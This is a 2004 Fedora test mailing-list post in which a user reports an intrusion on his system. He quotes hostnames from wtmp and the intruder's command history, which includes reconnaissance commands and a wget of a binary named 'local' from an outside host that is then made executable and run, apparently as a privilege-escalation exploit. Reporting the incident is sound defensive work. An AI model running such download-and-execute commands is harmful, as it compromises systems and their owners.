Vulnerability on FC3T2 ? Present in FC3 ?

richard mullens mullens at ntlworld.com
Mon Nov 22 02:14:27 UTC 2004


Someone logged into my system on 13 Nov 2004
I found the following in /var/log/wtmp

207-36-180-20.prt.primarydns.com
demo.allegientsystems.com

My user password was changed - but not the root password - and the 
following commands had been executed:-

w
uname -a
cat /etc/issue
cd /tmp
wget chebeleu.com/local
chmod +x local
./local -d -r
./local -d -r
lunx
lynx

There is a similar report dated 10-Nov-2004 at 
http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
where someone suggested it might be the exploit at 
http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php

Anybody know any more ?




More information about the fedora-test-list mailing list